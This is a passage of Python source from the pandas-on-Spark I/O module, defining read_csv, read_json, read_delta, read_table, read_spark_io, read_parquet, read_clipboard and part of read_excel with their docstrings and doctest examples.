4 4\n\n When start, end, and step are specified:\n\n >>> ps.range(start = 100, end = 200, step = 20)\n id\n 0 100\n 1 120\n 2 140\n 3 160\n 4 180\n \"\"\"\n sdf = default_session().range(start=start, end=end, step=step, numPartitions=num_partitions)\n return DataFrame(sdf)\n\n\ndef read_csv(\n path: Union[str, List[str]],\n sep: str = \",\",\n header: Union[str, int, None] = \"infer\",\n names: Optional[Union[str, List[str]]] = None,\n index_col: Optional[Union[str, List[str]]] = None,\n usecols: Optional[Union[List[int], List[str], Callable[[str], bool]]] = None,\n mangle_dupe_cols: bool = True,\n dtype: Optional[Union[str, Dtype, Dict[str, Union[str, Dtype]]]] = None,\n nrows: Optional[int] = None,\n parse_dates: bool = False,\n quotechar: Optional[str] = None,\n escapechar: Optional[str] = None,\n comment: Optional[str] = None,\n encoding: Optional[str] = None,\n **options: Any,\n) -> Union[DataFrame, Series]:\n \"\"\"Read CSV (comma-separated) file into DataFrame or Series.\n\n Parameters\n ----------\n path : str or list\n Path(s) of the CSV file(s) to be read.\n sep : str, default ‘,’\n Delimiter to use. Non empty string.\n header : int, default ‘infer’\n Whether to use the column names, and the start of the data.\n Default behavior is to infer the column names: if no names are passed\n the behavior is identical to `header=0` and column names are inferred from\n the first line of the file, if column names are passed explicitly then\n the behavior is identical to `header=None`. Explicitly pass `header=0` to be\n able to replace existing names\n names : str or array-like, optional\n List of column names to use. If file contains no header row, then you should\n explicitly pass `header=None`. Duplicates in this list will cause an error to be issued.\n If a string is given, it should be a DDL-formatted string in Spark SQL, which is\n preferred to avoid schema inference for better performance.\n index_col: str or list of str, optional, default: None\n Index column of table in Spark.\n usecols : list-like or callable, optional\n Return a subset of the columns. If list-like, all elements must either be\n positional (i.e. 
integer indices into the document columns) or strings that\n correspond to column names provided either by the user in names or inferred\n from the document header row(s).\n If callable, the callable function will be evaluated against the column names,\n returning names where the callable function evaluates to `True`.\n mangle_dupe_cols : bool, default True\n Duplicate columns will be specified as 'X0', 'X1', ... 'XN', rather\n than 'X' ... 'X'. Passing in False will cause data to be overwritten if\n there are duplicate names in the columns.\n Currently only `True` is allowed.\n\n .. deprecated:: 3.4.0\n\n dtype : Type name or dict of column -> type, default None\n Data type for data or columns. E.g. {‘a’: np.float64, ‘b’: np.int32} Use str or object\n together with suitable na_values settings to preserve and not interpret dtype.\n nrows : int, default None\n Number of rows to read from the CSV file.\n parse_dates : boolean or list of ints or names or list of lists or dict, default `False`.\n Currently only `False` is allowed.\n quotechar : str (length 1), optional\n The character used to denote the start and end of a quoted item. Quoted items can include\n the delimiter and it will be ignored.\n escapechar : str (length 1), default None\n One-character string used to escape other characters.\n comment: str, optional\n Indicates the line should not be parsed.\n encoding: str, optional\n Indicates the encoding to read file\n options : dict\n All other options passed directly into Spark's data source.\n\n Returns\n -------\n DataFrame or Series\n\n See Also\n --------\n DataFrame.to_csv : Write DataFrame to a comma-separated values (csv) file.\n\n Examples\n --------\n >>> ps.read_csv('data.csv') # doctest: +SKIP\n\n Load multiple CSV files as a single DataFrame:\n\n >>> ps.read_csv(['data-01.csv', 'data-02.csv']) # doctest: +SKIP\n \"\"\"\n # For latin-1 encoding is same as iso-8859-1, that's why its mapped to iso-8859-1.\n encoding_mapping = {\"latin-1\": \"iso-8859-1\"}\n\n if \"options\" in options and isinstance(options.get(\"options\"), dict) and len(options) == 1:\n options = options.get(\"options\")\n\n if mangle_dupe_cols is not True:\n raise ValueError(\"mangle_dupe_cols can only be `True`: %s\" % mangle_dupe_cols)\n if parse_dates is not False:\n raise ValueError(\"parse_dates can only be `False`: %s\" % parse_dates)\n\n if usecols is not None and not callable(usecols):\n usecols = list(usecols) # type: ignore[assignment]\n\n if usecols is None or callable(usecols) or len(usecols) > 0:\n reader = default_session().read\n reader.option(\"inferSchema\", True)\n reader.option(\"sep\", sep)\n\n if header == \"infer\":\n header = 0 if names is None else None\n if header == 0:\n reader.option(\"header\", True)\n elif header is None:\n reader.option(\"header\", False)\n else:\n raise ValueError(\"Unknown header argument {}\".format(header))\n\n if quotechar is not None:\n reader.option(\"quote\", quotechar)\n if escapechar is not None:\n reader.option(\"escape\", escapechar)\n\n if comment is not None:\n if not isinstance(comment, str) or len(comment) != 1:\n raise ValueError(\"Only length-1 comment characters supported\")\n reader.option(\"comment\", comment)\n\n reader.options(**options)\n\n if encoding is not None:\n reader.option(\"encoding\", encoding_mapping.get(encoding, encoding))\n\n column_labels: Dict[Any, str]\n if isinstance(names, str):\n sdf = reader.schema(names).csv(path)\n column_labels = {col: col for col in sdf.columns}\n else:\n sdf = reader.csv(path)\n if 
is_list_like(names):\n                names = list(names)\n                if len(set(names)) != len(names):\n
                    raise ValueError(\"Found non-unique column index\")\n                if len(names) != len(sdf.columns):\n
                    raise ValueError(\n                        \"The number of names [%s] does not match the number \"\n
                        \"of columns [%d]. Try names by a Spark SQL DDL-formatted \"\n
                        \"string.\" % (len(names), len(sdf.schema))\n                    )\n
                column_labels = dict(zip(names, sdf.columns))\n            elif header is None:\n
                column_labels = dict(enumerate(sdf.columns))\n            else:\n
                column_labels = {col: col for col in sdf.columns}\n\n        if usecols is not None:\n
            missing: List[Union[int, str]]\n            if callable(usecols):\n                column_labels = {\n
                    label: col for label, col in column_labels.items() if usecols(label)\n                }\n
                missing = []\n            elif all(isinstance(col, int) for col in usecols):\n
                usecols_ints = cast(List[int], usecols)\n                new_column_labels = {\n
                    label: col\n                    for i, (label, col) in enumerate(column_labels.items())\n
                    if i in usecols_ints\n                }\n                missing = [\n                    col\n
                    for col in usecols_ints\n                    if (\n                        col >= len(column_labels)\n
                        or list(column_labels)[col] not in new_column_labels\n                    )\n                ]\n
                column_labels = new_column_labels\n            elif all(isinstance(col, str) for col in usecols):\n
                new_column_labels = {\n                    label: col for label, col in column_labels.items() if label in usecols\n
                }\n                missing = [col for col in usecols if col not in new_column_labels]\n
                column_labels = new_column_labels\n            else:\n                raise ValueError(\n
                    \"'usecols' must either be list-like of all strings, \"\n
                    \"all unicode, all integers or a callable.\"\n                )\n            if len(missing) > 0:\n
                raise ValueError(\n                    \"Usecols do not match columns, columns expected but not \" \"found: %s\" % missing\n
                )\n\n            if len(column_labels) > 0:\n
                sdf = sdf.select([scol_for(sdf, col) for col in column_labels.values()])\n            else:\n
                sdf = default_session().createDataFrame([], schema=StructType())\n    else:\n
        sdf = default_session().createDataFrame([], schema=StructType())\n        column_labels = {}\n\n
    if nrows is not None:\n        sdf = sdf.limit(nrows)\n\n    index_spark_column_names: List[str]\n
    index_names: List[Label]\n    if index_col is not None:\n        if isinstance(index_col, (str, int)):\n
            index_col = [index_col]\n        for col in index_col:\n            if col not in column_labels:\n
                raise KeyError(col)\n        index_spark_column_names = [column_labels[col] for col in index_col]\n
        index_names = [(col,) for col in index_col]\n        column_labels = {\n
            label: col for label, col in column_labels.items() if label not in index_col\n        }\n    else:\n
        log_advice(\n            \"If `index_col` is not specified for `read_csv`, \"\n
            \"the default index is attached which can cause additional overhead.\"\n        )\n
        index_spark_column_names = []\n        index_names = []\n\n    psdf: DataFrame = DataFrame(\n
        InternalFrame(\n            spark_frame=sdf,\n
            index_spark_columns=[scol_for(sdf, col) for col in index_spark_column_names],\n
            index_names=index_names,\n            column_labels=[\n
                label if is_name_like_tuple(label) else (label,) for label in column_labels\n            ],\n
            data_spark_columns=[scol_for(sdf, col) for col in column_labels.values()],\n        )\n    )\n\n
    if dtype is not None:\n        if isinstance(dtype, dict):\n            for col, tpe in dtype.items():\n
                psdf[col] = psdf[col].astype(tpe)\n        else:\n            for col in psdf.columns:\n
                psdf[col] = psdf[col].astype(dtype)\n\n    return psdf\n\n\ndef read_json(\n
    path: str, lines: bool = True, index_col: Optional[Union[str, List[str]]] = None, **options: Any\n) -> DataFrame:\n
    \"\"\"\n    Convert a JSON string to DataFrame.\n\n    Parameters\n    ----------\n    path : string\n
        File path\n    lines : bool, default True\n        Read the file as a JSON object per line. 
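Tying the read_csv parameters above together, a small usage sketch; the file path and the DDL column list are placeholders, and index_col is passed explicitly to avoid the default-index overhead that log_advice warns about:

import pyspark.pandas as ps

# A DDL-formatted `names` string skips schema inference, per the docstring above.
psdf = ps.read_csv(
    "/data/events.csv",              # placeholder path
    names="id INT, amount DOUBLE",
    index_col="id",
)

# `usecols` may also be a callable evaluated against each column label.
subset = ps.read_csv("/data/events.csv", usecols=lambda c: c != "amount")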
It should be always True for now.\n index_col : str or list of str, optional, default: None\n Index column of table in Spark.\n options : dict\n All other options passed directly into Spark's data source.\n\n Examples\n --------\n >>> df = ps.DataFrame([['a', 'b'], ['c', 'd']],\n ... columns=['col 1', 'col 2'])\n\n >>> df.to_json(path=r'%s/read_json/foo.json' % path, num_files=1)\n >>> ps.read_json(\n ... path=r'%s/read_json/foo.json' % path\n ... ).sort_values(by=\"col 1\")\n col 1 col 2\n 0 a b\n 1 c d\n\n >>> df.to_json(path=r'%s/read_json/foo.json' % path, num_files=1, lineSep='___')\n >>> ps.read_json(\n ... path=r'%s/read_json/foo.json' % path, lineSep='___'\n ... ).sort_values(by=\"col 1\")\n col 1 col 2\n 0 a b\n 1 c d\n\n You can preserve the index in the roundtrip as below.\n\n >>> df.to_json(path=r'%s/read_json/bar.json' % path, num_files=1, index_col=\"index\")\n >>> ps.read_json(\n ... path=r'%s/read_json/bar.json' % path, index_col=\"index\"\n ... ).sort_values(by=\"col 1\") # doctest: +NORMALIZE_WHITESPACE\n col 1 col 2\n index\n 0 a b\n 1 c d\n \"\"\"\n if index_col is None:\n log_advice(\n \"If `index_col` is not specified for `read_json`, \"\n \"the default index is attached which can cause additional overhead.\"\n )\n if \"options\" in options and isinstance(options.get(\"options\"), dict) and len(options) == 1:\n options = options.get(\"options\")\n\n if not lines:\n raise NotImplementedError(\"lines=False is not implemented yet.\")\n\n return read_spark_io(path, format=\"json\", index_col=index_col, **options)\n\n\ndef read_delta(\n path: str,\n version: Optional[str] = None,\n timestamp: Optional[str] = None,\n index_col: Optional[Union[str, List[str]]] = None,\n **options: Any,\n) -> DataFrame:\n \"\"\"\n Read a Delta Lake table on some file system and return a DataFrame.\n\n If the Delta Lake table is already stored in the catalog (aka the metastore), use 'read_table'.\n\n Parameters\n ----------\n path : string\n Path to the Delta Lake table.\n version : string, optional\n Specifies the table version (based on Delta's internal transaction version) to read from,\n using Delta's time travel feature. This sets Delta's 'versionAsOf' option. Note that\n this parameter and `timestamp` parameter cannot be used together, otherwise it will raise a\n `ValueError`.\n timestamp : string, optional\n Specifies the table version (based on timestamp) to read from,\n using Delta's time travel feature. This must be a valid date or timestamp string in Spark,\n and sets Delta's 'timestampAsOf' option. Note that this parameter and `version` parameter\n cannot be used together, otherwise it will raise a `ValueError`.\n index_col : str or list of str, optional, default: None\n Index column of table in Spark.\n options\n Additional options that can be passed onto Delta.\n\n Returns\n -------\n DataFrame\n\n See Also\n --------\n DataFrame.to_delta\n read_table\n read_spark_io\n read_parquet\n\n Examples\n --------\n >>> ps.range(1).to_delta('%s/read_delta/foo' % path) # doctest: +SKIP\n >>> ps.read_delta('%s/read_delta/foo' % path) # doctest: +SKIP\n id\n 0 0\n\n >>> ps.range(10, 15, num_partitions=1).to_delta('%s/read_delta/foo' % path,\n ... mode='overwrite') # doctest: +SKIP\n >>> ps.read_delta('%s/read_delta/foo' % path) # doctest: +SKIP\n id\n 0 10\n 1 11\n 2 12\n 3 13\n 4 14\n\n >>> ps.read_delta('%s/read_delta/foo' % path, version=0) # doctest: +SKIP\n id\n 0 0\n\n You can preserve the index in the roundtrip as below.\n\n >>> ps.range(10, 15, num_partitions=1).to_delta(\n ... 
'%s/read_delta/bar' % path, index_col=\"index\") # doctest: +SKIP\n >>> ps.read_delta('%s/read_delta/bar' % path, index_col=\"index\") # doctest: +SKIP\n id\n index\n 0 10\n 1 11\n 2 12\n 3 13\n 4 14\n \"\"\"\n if index_col is None:\n log_advice(\n \"If `index_col` is not specified for `read_delta`, \"\n \"the default index is attached which can cause additional overhead.\"\n )\n if version is not None and timestamp is not None:\n raise ValueError(\"version and timestamp cannot be used together.\")\n if \"options\" in options and isinstance(options.get(\"options\"), dict) and len(options) == 1:\n options = options.get(\"options\")\n\n if version is not None:\n options[\"versionAsOf\"] = version\n if timestamp is not None:\n options[\"timestampAsOf\"] = timestamp\n return read_spark_io(path, format=\"delta\", index_col=index_col, **options)\n\n\ndef read_table(name: str, index_col: Optional[Union[str, List[str]]] = None) -> DataFrame:\n \"\"\"\n Read a Spark table and return a DataFrame.\n\n Parameters\n ----------\n name : string\n Table name in Spark.\n\n index_col : str or list of str, optional, default: None\n Index column of table in Spark.\n\n Returns\n -------\n DataFrame\n\n See Also\n --------\n DataFrame.to_table\n read_delta\n read_parquet\n read_spark_io\n\n Examples\n --------\n >>> ps.range(1).to_table('%s.my_table' % db)\n >>> ps.read_table('%s.my_table' % db)\n id\n 0 0\n\n >>> ps.range(1).to_table('%s.my_table' % db, index_col=\"index\")\n >>> ps.read_table('%s.my_table' % db, index_col=\"index\") # doctest: +NORMALIZE_WHITESPACE\n id\n index\n 0 0\n \"\"\"\n if index_col is None:\n log_advice(\n \"If `index_col` is not specified for `read_table`, \"\n \"the default index is attached which can cause additional overhead.\"\n )\n sdf = default_session().read.table(name)\n index_spark_columns, index_names = _get_index_map(sdf, index_col)\n\n return DataFrame(\n InternalFrame(\n spark_frame=sdf, index_spark_columns=index_spark_columns, index_names=index_names\n )\n )\n\n\ndef read_spark_io(\n path: Optional[str] = None,\n format: Optional[str] = None,\n schema: Union[str, \"StructType\"] = None,\n index_col: Optional[Union[str, List[str]]] = None,\n **options: Any,\n) -> DataFrame:\n \"\"\"Load a DataFrame from a Spark data source.\n\n Parameters\n ----------\n path : string, optional\n Path to the data source.\n format : string, optional\n Specifies the output data source format. Some common ones are:\n\n - 'delta'\n - 'parquet'\n - 'orc'\n - 'json'\n - 'csv'\n schema : string or StructType, optional\n Input schema. If none, Spark tries to infer the schema automatically.\n The schema can either be a Spark StructType, or a DDL-formatted string like\n `col0 INT, col1 DOUBLE`.\n index_col : str or list of str, optional, default: None\n Index column of table in Spark.\n options : dict\n All other options passed directly into Spark's data source.\n\n See Also\n --------\n DataFrame.to_spark_io\n DataFrame.read_table\n DataFrame.read_delta\n DataFrame.read_parquet\n\n Examples\n --------\n >>> ps.range(1).to_spark_io('%s/read_spark_io/data.parquet' % path)\n >>> ps.read_spark_io(\n ... '%s/read_spark_io/data.parquet' % path, format='parquet', schema='id long')\n id\n 0 0\n\n >>> ps.range(10, 15, num_partitions=1).to_spark_io('%s/read_spark_io/data.json' % path,\n ... format='json', lineSep='__')\n >>> ps.read_spark_io(\n ... 
'%s/read_spark_io/data.json' % path, format='json', schema='id long', lineSep='__')\n id\n 0 10\n 1 11\n 2 12\n 3 13\n 4 14\n\n You can preserve the index in the roundtrip as below.\n\n >>> ps.range(10, 15, num_partitions=1).to_spark_io('%s/read_spark_io/data.orc' % path,\n ... format='orc', index_col=\"index\")\n >>> ps.read_spark_io(\n ... path=r'%s/read_spark_io/data.orc' % path, format=\"orc\", index_col=\"index\")\n ... # doctest: +NORMALIZE_WHITESPACE\n id\n index\n 0 10\n 1 11\n 2 12\n 3 13\n 4 14\n \"\"\"\n if \"options\" in options and isinstance(options.get(\"options\"), dict) and len(options) == 1:\n options = options.get(\"options\")\n\n sdf = default_session().read.load(path=path, format=format, schema=schema, **options)\n index_spark_columns, index_names = _get_index_map(sdf, index_col)\n\n return DataFrame(\n InternalFrame(\n spark_frame=sdf, index_spark_columns=index_spark_columns, index_names=index_names\n )\n )\n\n\ndef read_parquet(\n path: str,\n columns: Optional[List[str]] = None,\n index_col: Optional[List[str]] = None,\n pandas_metadata: bool = False,\n **options: Any,\n) -> DataFrame:\n \"\"\"Load a parquet object from the file path, returning a DataFrame.\n\n Parameters\n ----------\n path : string\n File path\n columns : list, default=None\n If not None, only these columns will be read from the file.\n index_col : str or list of str, optional, default: None\n Index column of table in Spark.\n pandas_metadata : bool, default: False\n If True, try to respect the metadata if the Parquet file is written from pandas.\n options : dict\n All other options passed directly into Spark's data source.\n\n Returns\n -------\n DataFrame\n\n See Also\n --------\n DataFrame.to_parquet\n DataFrame.read_table\n DataFrame.read_delta\n DataFrame.read_spark_io\n\n Examples\n --------\n >>> ps.range(1).to_parquet('%s/read_spark_io/data.parquet' % path)\n >>> ps.read_parquet('%s/read_spark_io/data.parquet' % path, columns=['id'])\n id\n 0 0\n\n You can preserve the index in the roundtrip as below.\n\n >>> ps.range(1).to_parquet('%s/read_spark_io/data.parquet' % path, index_col=\"index\")\n >>> ps.read_parquet('%s/read_spark_io/data.parquet' % path, columns=['id'], index_col=\"index\")\n ... 
# doctest: +NORMALIZE_WHITESPACE\n           id\n    index\n    0       0\n    \"\"\"\n    if index_col is None:\n
        log_advice(\n            \"If `index_col` is not specified for `read_parquet`, \"\n
            \"the default index is attached which can cause additional overhead.\"\n        )\n
    if \"options\" in options and isinstance(options.get(\"options\"), dict) and len(options) == 1:\n
        options = options.get(\"options\")\n\n    if columns is not None:\n        columns = list(columns)\n\n
    index_names = None\n\n    if index_col is None and pandas_metadata:\n        # Try to read pandas metadata\n\n
        @pandas_udf(  # type: ignore[call-overload]\n            \"index_col array<string>, index_names array<string>\"\n        )\n
        def read_index_metadata(pser: pd.Series) -> pd.DataFrame:\n            binary = pser.iloc[0]\n
            metadata = pq.ParquetFile(pa.BufferReader(binary)).metadata.metadata\n            if b\"pandas\" in metadata:\n
                pandas_metadata = json.loads(metadata[b\"pandas\"].decode(\"utf8\"))\n
                if all(isinstance(col, str) for col in pandas_metadata[\"index_columns\"]):\n
                    index_col = []\n                    index_names = []\n
                    for col in pandas_metadata[\"index_columns\"]:\n                        index_col.append(col)\n
                        for column in pandas_metadata[\"columns\"]:\n
                            if column[\"field_name\"] == col:\n                                index_names.append(column[\"name\"])\n
                                break\n                        else:\n                            index_names.append(None)\n
                    return pd.DataFrame({\"index_col\": [index_col], \"index_names\": [index_names]})\n
            return pd.DataFrame({\"index_col\": [None], \"index_names\": [None]})\n\n
        index_col, index_names = (\n            default_session()\n            .read.format(\"binaryFile\")\n
            .load(path)\n            .limit(1)\n            .select(read_index_metadata(\"content\").alias(\"index_metadata\"))\n
            .select(\"index_metadata.*\")\n            .head()\n        )\n\n
    psdf = read_spark_io(path=path, format=\"parquet\", options=options, index_col=index_col)\n\n
    if columns is not None:\n        new_columns = [c for c in columns if c in psdf.columns]\n
        if len(new_columns) > 0:\n            psdf = psdf[new_columns]\n        else:\n
            sdf = default_session().createDataFrame([], schema=StructType())\n
            index_spark_columns, index_names = _get_index_map(sdf, index_col)\n            psdf = DataFrame(\n
                InternalFrame(\n                    spark_frame=sdf,\n
                    index_spark_columns=index_spark_columns,\n                    index_names=index_names,\n
                )\n            )\n\n    if index_names is not None:\n        psdf.index.names = index_names\n\n
    return psdf\n\n\ndef read_clipboard(sep: str = r\"\\s+\", **kwargs: Any) -> DataFrame:\n    r\"\"\"\n
    Read text from clipboard and pass to read_csv. See read_csv for the\n    full argument list\n\n
    Parameters\n    ----------\n    sep : str, default '\\s+'\n        A string or regex delimiter. 
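The footer lookup that read_parquet performs above is easy to verify locally with pyarrow alone. A short sketch; the file path is a placeholder, and this inspects the same b"pandas" metadata key the pandas_udf reads:

import json
import pandas as pd
import pyarrow.parquet as pq

# Write a tiny parquet file from pandas so the footer carries pandas metadata.
pdf = pd.DataFrame({"x": [1, 2]}, index=pd.Index([10, 20], name="id"))
pdf.to_parquet("/tmp/meta_demo.parquet")  # placeholder path; requires pyarrow

# Same footer lookup the UDF above performs on the first binary file.
meta = pq.ParquetFile("/tmp/meta_demo.parquet").metadata.metadata
pandas_meta = json.loads(meta[b"pandas"].decode("utf8"))
print(pandas_meta["index_columns"])  # ['id'], which becomes index_col above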
The default of '\\s+' denotes\n one or more whitespace characters.\n\n See Also\n --------\n DataFrame.to_clipboard : Write text out to clipboard.\n\n Returns\n -------\n parsed : DataFrame\n \"\"\"\n return cast(DataFrame, from_pandas(pd.read_clipboard(sep, **kwargs)))\n\n\ndef read_excel(\n io: Union[str, Any],\n sheet_name: Union[str, int, List[Union[str, int]], None] = 0,\n header: Union[int, List[int]] = 0,\n names: Optional[List] = None,\n index_col: Optional[List[int]] = None,\n usecols: Optional[Union[int, str, List[Union[int, str]], Callable[[str], bool]]] = None,\n dtype: Optional[Dict[str, Union[str, Dtype]]] = None,\n engine: Optional[str] = None,\n converters: Optional[Dict] = None,\n true_values: Optional[Any] = None,\n false_values: Optional[Any] = None,\n skiprows: Optional[Union[int, List[int]]] = None,\n nrows: Optional[int] = None,\n na_values: Optional[Any] = None,\n keep_default_na: bool = True,\n verbose: bool = False,\n parse_dates: Union[bool, List, Dict] = False,\n date_parser: Optional[Callable] = None,\n thousands: Optional[str] = None,\n comment: Optional[str] = None,\n skipfooter: int = 0,\n convert_float: bool = True,\n mangle_dupe_cols: bool = True,\n **kwds: Any,\n) -> Union[DataFrame, Series, Dict[str, Union[DataFrame, Series]]]:\n \"\"\"\n Read an Excel file into a pandas-on-Spark DataFrame or Series.\n\n Support both `xls` and `xlsx` file extensions from a local filesystem or URL.\n Support an option to read a single sheet or a list of sheets.\n\n Parameters\n ----------\n io : str, file descriptor, pathlib.Path, ExcelFile or xlrd.Book\n The string could be a URL. The value URL must be available in Spark's DataFrameReader.\n\n .. note::\n If the underlying Spark is below 3.0, the parameter as a string is not supported.\n You can use `ps.from_pandas(pd.read_excel(...))` as a workaround.\n\n sheet_name : str, int, list, or None, default 0\n Strings are used for sheet names. Integers are used in zero-indexed\n sheet positions. Lists of strings/integers are used to request\n multiple sheets. Specify None to get all sheets.\n\n Available cases:\n\n * Defaults to ``0``: 1st sheet as a `DataFrame`\n * ``1``: 2nd sheet as a `DataFrame`\n * ``\"Sheet1\"``: Load sheet with name \"Sheet1\"\n * ``[0, 1, \"Sheet5\"]``: Load first, second and sheet named \"Sheet5\"\n as a dict of `DataFrame`\n * None: All sheets.\n\n header : int, list of int, default 0\n Row (0-indexed) to use for the column labels of the parsed\n DataFrame. If a list of integers is passed those row positions will\n be combined into a ``MultiIndex``. Use None if there is no header.\n names : array-like, default None\n List of column names to use. If file contains no header row,\n then you should explicitly pass header=None.\n index_col : int, list of int, default None\n Column (0-indexed) to use as the row labels of the DataFrame.\n Pass None if there is no such column. If a list is passed,\n those columns will be combined into a ``MultiIndex``. If a\n subset of data is selected with ``usecols``, index_col\n is based on the subset.\n usecols : int, str, list-like, or callable default None\n Return a subset of the columns.\n\n * If None, then parse all columns.\n * If str, then indicates comma separated list of Excel column letters\n and column ranges (e.g. \"A:E\" or \"A,C,E:F\"). 
Ranges are inclusive of\n both sides.\n * If list of int, then indicates list of column numbers to be parsed.\n * If list of string, then indicates list of column names to be parsed.\n * If callable, then evaluate each column name against it and parse the\n column if the callable returns ``True``.\n dtype : Type name or dict of column -> type, default None\n Data type for data or columns. E.g. {'a': np.float64, 'b': np.int32}\n Use `object` to preserve data as stored in Excel and not interpret dtype.\n If converters are specified, they will be applied INSTEAD\n of dtype conversion.\n engine : str, default None\n If io is not a buffer or path, this must be set to identify io.\n Acceptable values are None or xlrd.\n converters : dict, default None\n Dict of functions for converting values in certain columns. Keys can\n either be integers or column labels, values are functions that take one\n input argument, the Excel cell content, and return the transformed\n content.\n true_values : list, default None\n Values to consider as True.\n false_values : list, default None\n Values to consider as False.\n skiprows : list-like\n Rows to skip at the beginning (0-indexed).\n nrows : int, default None\n Number of rows to parse.\n na_values : scalar, str, list-like, or dict, default None\n Additional strings to recognize as NA/NaN. If dict passed, specific\n per-column NA values. By default the following values are interpreted\n as NaN.\n keep_default_na : bool, default True\n If na_values are specified and keep_default_na is False the default NaN\n values are overridden, otherwise they're appended to.\n verbose : bool, default False\n Indicate number of NA values placed in non-numeric columns.\n parse_dates : bool, list-like, or dict, default False\n The behavior is as follows:\n\n * bool. If True -> try parsing the index.\n * list of int or names. e.g. If [1, 2, 3] -> try parsing columns 1, 2, 3\n each as a separate date column.\n * list of lists. e.g. If [[1, 3]] -> combine columns 1 and 3 and parse as\n a single date column.\n * dict, e.g. {{'foo' : [1, 3]}} -> parse columns 1, 3 as date and call\n result 'foo'\n\n If a column or index contains an unparseable date, the entire column or\n index will be returned unaltered as an object data type. For non-standard\n datetime parsing, use ``pd.to_datetime`` after ``pd.read_csv``\n\n Note: A fast-path exists for iso8601-formatted dates.\n date_parser : function, optional\n Function to use for converting a sequence of string columns to an array of\n datetime instances. The default uses ``dateutil.parser.parser`` to do the\n conversion. pandas-on-Spark will try to call `date_parser` in three different ways,\n advancing to the next if an exception occurs: 1) Pass one or more arrays\n (as defined by `parse_dates`) as arguments; 2) concatenate (row-wise) the\n string values from the columns defined by `parse_dates` into a single array\n and pass that; and 3) call `date_parser` once for each row using one or\n more strings (corresponding to the columns defined by `parse_dates`) as\n arguments.\n thousands : str, default None\n Thousands separator for parsing string columns to numeric. Note that\n this parameter is only necessary for columns stored as TEXT in Excel,\n any numeric columns will automatically be parsed, regardless of display\n format.\n comment : str, default None\n Comments out remainder of line. Pass a character or characters to this\n argument to indicate comments in the input file. 
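A brief sketch pulling several of the read_excel parameters described here together; the workbook name, sheet, column range, and converter are placeholders, not values from the text:

import pyspark.pandas as ps

psdf = ps.read_excel(
    "report.xlsx",                    # placeholder workbook
    sheet_name=0,
    usecols="A:C",                    # Excel letter range, inclusive of both ends
    converters={"Value": lambda v: float(str(v).replace(",", ""))},
    skiprows=[0],                     # 0-indexed rows to drop before parsing
)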
Any data between the\n comment string and the end of the current line is ignored.\n skipfooter : int, default 0\n Rows at the end to skip (0-indexed).\n convert_float : bool, default True\n Convert integral floats to int (i.e., 1.0 --> 1). If False, all numeric\n data will be read in as floats: Excel stores all numbers as floats\n internally.\n\n .. deprecated:: 3.4.0\n\n mangle_dupe_cols : bool, default True\n Duplicate columns will be specified as 'X', 'X.1', ...'X.N', rather than\n 'X'...'X'. Passing in False will cause data to be overwritten if there\n are duplicate names in the columns.\n\n .. deprecated:: 3.4.0\n\n **kwds : optional\n Optional keyword arguments can be passed to ``TextFileReader``.\n\n Returns\n -------\n DataFrame or dict of DataFrames\n DataFrame from the passed in Excel file. See notes in sheet_name\n argument for more information on when a dict of DataFrames is returned.\n\n See Also\n --------\n DataFrame.to_excel : Write DataFrame to an Excel file.\n DataFrame.to_csv : Write DataFrame to a comma-separated values (csv) file.\n read_csv : Read a comma-separated values (csv) file into DataFrame.\n\n Examples\n --------\n The file can be read using the file name as string or an open file object:\n\n >>> ps.read_excel('tmp.xlsx', index_col=0) # doctest: +SKIP\n Name Value\n 0 string1 1\n 1 string2 2\n 2 #Comment 3\n\n >>> ps.read_excel(open('tmp.xlsx', 'rb'),\n ... sheet_name='Sheet3') # doctest: +SKIP\n Unnamed: 0 Name Value\n 0 0 string1 1\n 1 1 string2 2\n 2 2 #Comment 3\n\n Index and header can be specified via the `index_col` and `header` arguments\n\n >>> ps.read_excel('tmp.xlsx', index_col=None, header=None) # doctest: +SKIP\n 0 1 2\n 0 NaN Name Value\n 1 0.0 string1 1\n 2 1.0 string2 2\n 3 2.0 #Comment 3\n\n Column types are inferred but can be explicitly specified\n\n >>> ps.read_excel('tmp.xlsx', index_col=0,\n ... dtype={'Name': str, 'Value': float}) # doctest: +SKIP\n Name Value\n 0 string1 1.0\n 1 string2 2.0\n 2 #Comment 3.0\n\n True, False, and NA values, and thousands separators have defaults,\n but can be explicitly specified, too. Supply the values you would like\n as strings or lists of strings!\n\n >>> ps.read_excel('tmp.xlsx', index_col=0,\n ... 
na_values=['string1', 'string2']) # doctest: +SKIP\n Name Value\n 0 None 1\n 1 None 2\n 2 #Comment 3\n\n Comment lines in the excel input file can be skipped using the `comment` kwarg\n\n >>> ps.read_excel('tmp.xlsx', index_col=0, comment='#') # doctest: +SKIP\n Name Value\n 0 string1 1.0\n 1 string2 2.0\n 2 None NaN\n \"\"\"\n\n def pd_read_excel(\n io_or_bin: Any, sn: Union[str, int, List[Union[str, int]], None]\n ) -> pd.DataFrame:\n return pd.read_excel(\n io=BytesIO(io_or_bin) if isinstance(io_or_bin, (bytes, bytearray)) else io_or_bin,\n sheet_name=sn,\n header=header,\n names=names,\n index_col=index_col,\n usecols=usecols,\n dtype=dtype,\n engine=engine,\n converters=converters,\n true_values=true_values,\n false_values=false_values,\n skiprows=skiprows,\n nrows=nrows,\n na_values=na_values,\n keep_default_na=keep_default_na,\n verbose=verbose,\n parse_dates=parse_dates, # type: ignore[arg-type]\n date_parser=date_parser,\n thousands=thousands,\n comment=comment,\n skipfooter=skipfooter,\n convert_float=convert_float,\n mangle_dupe_cols=mangle_dupe_cols,\n **kwds,\n )\n\n if isinstance(io, str):\n # 'binaryFile' format is available since Spark 3.0.0.\n binaries = default_session().read.format(\"binaryFile\").load(io).select(\"content\").head(2)\n io_or_bin = binaries[0][0]\n single_file = len(binaries) == 1\n else:\n io_or_bin = io\n single_file = True\n\n pdf_or_psers = pd_read_excel(io_or_bin, sn=sheet_name)\n\n if single_file:\n if isinstance(pdf_or_psers, dict):\n return {\n sn: cast(Union[DataFrame, Series], from_pandas(pdf_or_pser))\n for sn, pdf_or_pser in pdf_or_psers.items()\n }\n else:\n return cast(Union[DataFrame, Series], from_pandas(pdf_or_psers))\n else:\n\n def read_excel_on_spark(\n pdf_or_pser: Union[pd.DataFrame, pd.Series],\n sn: Union[str, int, List[Union[str, int]], None],\n ) -> Union[DataFrame, Series]:\n if isinstance(pdf_or_pser, pd.Series):\n pdf = pdf_or_pser.to_frame()\n else:\n pdf = pdf_or_pser\n\n psdf = cast(DataFrame, from_pandas(pdf))\n return_schema = force_decimal_precision_scale(\n as_nullable_spark_type(psdf._internal.spark_frame.drop(*HIDDEN_COLUMNS).schema)\n )\n\n def output_func(pdf: 